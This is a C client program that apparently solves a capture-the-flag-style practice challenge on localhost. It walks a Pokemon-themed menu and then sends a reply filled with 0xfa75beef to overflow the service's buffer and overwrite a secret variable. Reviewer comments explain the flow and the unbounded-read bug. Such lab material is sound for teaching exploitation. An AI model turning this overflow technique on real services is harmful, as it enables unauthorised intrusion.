Created
January 19, 2017 05:33
#include <stdio.h> | |
#include <stdio.h> | |
#include <strings.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <sys/types.h> | |
#include <sys/wait.h> | |
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <string.h> | |
#include <stdio.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <sys/socket.h> | |
#include <netdb.h> | |
#include <arpa/inet.h> | |
#include <netinet/in.h> | |
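/* TCP port of the practice service, as a string so it can be passed to getaddrinfo(). */
#define PORTNO "12346"
/* Menu reply that selects option 1; the trailing newline is part of the reply. */
#define POKEMON_NUMBER "1\n"
/* The secret value that the server-side variable must hold to get the key. */
#define POKEMON_OVERWRITE 0xfa75beef
/* NOTE(review): presumably the size of the service's input buffer; confirm against the server source. */
#define TARGET_BUF_LEN 40
/* Element count of the outgoing payload array. */
#define MAX_SEND_BUFF 100
/* Byte size of the scratch buffer used for received prompts. */
#define MAX_RECV_BUFF 100
/*
 * Debug switch, tested with #ifdef only. Defined as 1 rather than `true`:
 * <stdbool.h> is not included, so `true` would be an undefined identifier
 * the moment anyone wrote `#if DEBUG` or used the macro in an expression.
 */
#define DEBUG 1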
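/*
 * Receive up to `len` bytes from socket `fd` and, when DEBUG is defined,
 * echo them to stdout.
 *
 * The request is clamped to MAX_RECV_BUFF - 1 bytes so the buffer always
 * keeps a terminating NUL: a caller passing len >= MAX_RECV_BUFF would
 * otherwise leave the string unterminated (or overrun the buffer), and a
 * negative len would convert to a huge size_t.
 *
 * Returns the value of recv(): the number of bytes received, 0 when the peer
 * closed the connection, or -1 on error (errno is set by recv).
 * A single recv() on a stream socket may return fewer bytes than requested.
 */
int recv_debug(int fd, int len) {
    char recv_buff[MAX_RECV_BUFF];
    size_t want;
    ssize_t got;

    if (len < 0) {
        want = 0;
    } else if ((size_t)len > sizeof recv_buff - 1) {
        want = sizeof recv_buff - 1;
    } else {
        want = (size_t)len;
    }

    memset(recv_buff, '\0', sizeof recv_buff);
    got = recv(fd, recv_buff, want, 0);

#ifdef DEBUG
    printf("** RECV_DEBUG: ");
    /* Peer-controlled bytes are printed as data, never used as the format string. */
    printf("%s", recv_buff);
#endif

    /* The original fell off the end of a non-void function. */
    return (int)got;
}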
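/*
 * Client for a practice service listening on 127.0.0.1:PORTNO.
 *
 * Flow: connect, read the four menu prompts, answer "1", read the follow-up
 * prompt, send a reply filled with POKEMON_OVERWRITE, read one byte back.
 *
 * NOTE(review): presumably the service copies this reply into a fixed-size
 * buffer without a length bound; confirm against the server source. The
 * server-side remedy for that class of bug is a bounded read.
 *
 * Returns 0 on completion, 1 if a send fails; exits with -1 if name
 * resolution, socket creation or connect fails.
 */
int main(void) {
    int sockfd;
    struct addrinfo hints, *res = NULL;
    ssize_t bytes_sent;
    int send_buff[MAX_SEND_BUFF];
    int rc;
    int i;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;

    /* Use PORTNO instead of repeating the literal, and check the lookup:
       on failure `res` is not valid and must not be dereferenced. */
    rc = getaddrinfo("127.0.0.1", PORTNO, &hints, &res);
    if (rc != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rc));
        exit(-1);
    }

    /* open a socket to the server */
    sockfd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (sockfd == -1) {
        perror("Error in socket:");
        freeaddrinfo(res);
        exit(-1);
    }

    if (connect(sockfd, res->ai_addr, res->ai_addrlen) == -1) {
        perror("Error in connect:");
        close(sockfd);
        freeaddrinfo(res);
        exit(-1);
    }

    /* The address list is only needed for socket()/connect(). */
    freeaddrinfo(res);
    res = NULL;

    /* Example menu sent by the server:
       Do you want to be a?
       1.) Pokemon Master
       2.) Elite Hacker
       3.) The Batman
    */

    /* The fixed lengths below assume each prompt arrives in one recv();
       TCP does not guarantee that. */

    /* Server sends its greeting: "Do you want to be a?" */
    recv_debug(sockfd, 21);
    /* Pokemon */
    recv_debug(sockfd, 19);
    /* Elite hacker */
    recv_debug(sockfd, 17);
    /* The batman */
    recv_debug(sockfd, 15);

    /* Tell it that we want to be a pokemon master (1) */
    bytes_sent = send(sockfd, POKEMON_NUMBER, 2, 0);
    if (bytes_sent == -1) {
        perror("Error in send:");
        close(sockfd);
        return 1;
    }

    /* Server sends another prompt, 44 bytes long: */
    /* "So you want to be the best there ever was?" */
    recv_debug(sockfd, 44);

    /* Build the reply */
    memset(send_buff, 0, sizeof send_buff);

    /* Fill it in with the secret */
    for (i = 0; i <= 33; i++) {
        send_buff[i] = (int)POKEMON_OVERWRITE;
    }
    send_buff[34] = '\n';

#ifdef DEBUG
    for (i = 0; i < 34; ++i) {
        /* %x expects unsigned int; the cast keeps the output identical. */
        printf("%02x\n", (unsigned int)send_buff[i]);
    }
#endif

    /* Send the secret phrase. The length argument is a byte count, so the
       first 34 bytes of send_buff go on the wire (kept as in the original). */
    bytes_sent = send(sockfd, send_buff, (size_t)34, 0);
    if (bytes_sent == -1) {
        perror("Error in send:");
        close(sockfd);
        return 1;
    }

    /* What should come next ? */
    recv_debug(sockfd, 1);
    fflush(stdout);

    /* Clean up */
    close(sockfd);
    return 0;
}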